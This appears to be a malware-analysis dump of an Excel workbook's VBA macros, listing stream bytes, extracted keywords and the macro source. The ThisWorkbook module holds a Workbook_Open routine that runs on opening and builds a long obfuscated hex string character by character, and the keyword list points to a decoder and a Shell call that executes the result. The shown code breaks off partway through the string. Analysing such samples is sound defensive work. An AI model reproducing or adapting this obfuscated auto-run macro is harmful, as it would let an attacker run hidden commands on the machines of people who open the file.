                                                Data Raw:01 16 03 00 06 00 01 00 00 5a 03 00 00 e4 00 00 00 10 02 00 00 88 03 00 00 96 03 00 00 ea 03 00 00 00 00 00 00 01 00 00 00 4a 17 93 bc 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 70 00 ff ff 00 00 cf 1d 21 63 4c 69 31 46 bb d7 ba e1 e7 4e 15 97 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                VBA Code Keywords

                                                Keyword
                                                False
                                                VB_Exposed
                                                Attribute
                                                VB_Name
                                                VB_Creatable
                                                VB_PredeclaredId
                                                VB_GlobalNameSpace
                                                VB_Base
                                                VB_Customizable
                                                VB_TemplateDerived
                                                VBA Code
                                                Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
                                                VBA File Name: ThisWorkbook.cls, Stream Size: 33779
                                                General
                                                Stream Path:VBA/ThisWorkbook
                                                VBA File Name:ThisWorkbook.cls
                                                Stream Size:33779
                                                Data ASCII:. . . . . . . . . B . . . . . . . 8 . . . . . . . . . . . ! p . . . . . . . . . . J . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . p . . . . . . @ . _ . . K G . 1 . 7 . . . . . . . . . . . . . . . . . . . F . . . . . . . . . . . . . . . . . . . . . G 5 ' . . r E . . ' . . [ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . G 5 ' . . r E . . ' . . [ . . . @ . _ . . K G . 1 . 7 . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                Data Raw:01 16 03 00 06 00 01 00 00 42 08 00 00 e4 00 00 00 38 02 00 00 a7 08 00 00 b5 08 00 00 21 70 00 00 00 00 00 00 01 00 00 00 4a 17 e6 02 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 70 00 ff ff 00 00 e9 40 be 5f 1b 17 4b 47 a6 31 e1 37 8b 19 f0 cd 19 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                VBA Code Keywords

                                                Keyword
                                                PzJjQLNaCwSTDGq)
                                                String,
                                                Val("&H"
                                                sssssss(CodeKey
                                                DataIn
                                                VB_Name
                                                VB_Creatable
                                                "ThisWorkbook"
                                                VB_Exposed
                                                strDataOut
                                                sssssss
                                                PzJjQLNaCwSTDGq
                                                Public
                                                Function
                                                String
                                                String)
                                                Len(CodeKey))
                                                lonDataPtr)
                                                sssssss("a",
                                                VB_Customizable
                                                Integer
                                                (Len(DataIn)
                                                retval
                                                ((lonDataPtr
                                                VB_TemplateDerived
                                                Asc(Mid$(CodeKey,
                                                (Mid$(DataIn,
                                                False
                                                lonDataPtr
                                                Attribute
                                                Workbook_Open()
                                                VB_PredeclaredId
                                                VB_GlobalNameSpace
                                                Shell(sssssss)
                                                VB_Base
                                                VBA Code
                                                Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Public Sub Workbook_Open()
Dim PzJjQLNaCwSTDGq As String
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "C"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "5"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "4"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "1"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "4"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "E"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "4"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "1"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "1"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "1"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "E"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "1"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "6"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "4"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "1"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "3"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "1"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "9"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "4"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "D"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "D"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "4"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "F"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "4"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "1"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "9"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "4"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "4"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "1"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "4"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "C"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "4"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "F"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "E"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "5"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "4"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "5"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "E"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "C"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "C"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "F"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "5"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "4"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "1"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "A"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "3"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "E"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "6"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "3"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "4"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "5"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "1"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "6"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "1"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "5"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "4"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "5"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "9"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "3"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "8"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "6"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "3"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "1"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "6"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "3"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "4"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "3"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "8"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "1"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "6"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "3"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "5"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "1"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "3"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "5"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "6"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "3"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "D"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "9"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "3"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "D"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "6"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "3"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "3"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "9"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "6"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "3"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "4"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "3"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "8"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "6"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "3"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "5"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "6"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "1"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "6"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "3"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "3"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "D"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "6"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "5"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "5"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "5"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "1"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "1"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "5"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "5"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "3"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "3"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "3"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "1"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "7"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "9"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "3"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "6"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "3"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "1"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "6"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "5"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "9"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "3"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "8"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "3"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "3"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "A"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "4"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "3"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "8"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "3"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "3"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "1"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "6"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "3"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "4"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "A"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "F"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "6"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "6"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "5"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "3"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "5"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "1"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "9"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "E"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "6"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "1"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "7"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "5"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "9"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "1"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "6"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "3"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "1"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "6"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "6"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "3"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "4"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "3"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "8"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "1"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "6"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "3"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "C"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "6"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "1"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "6"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "2"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
PzJjQLNaCwSTDGq = PzJjQLNaCwSTDGq + "0"
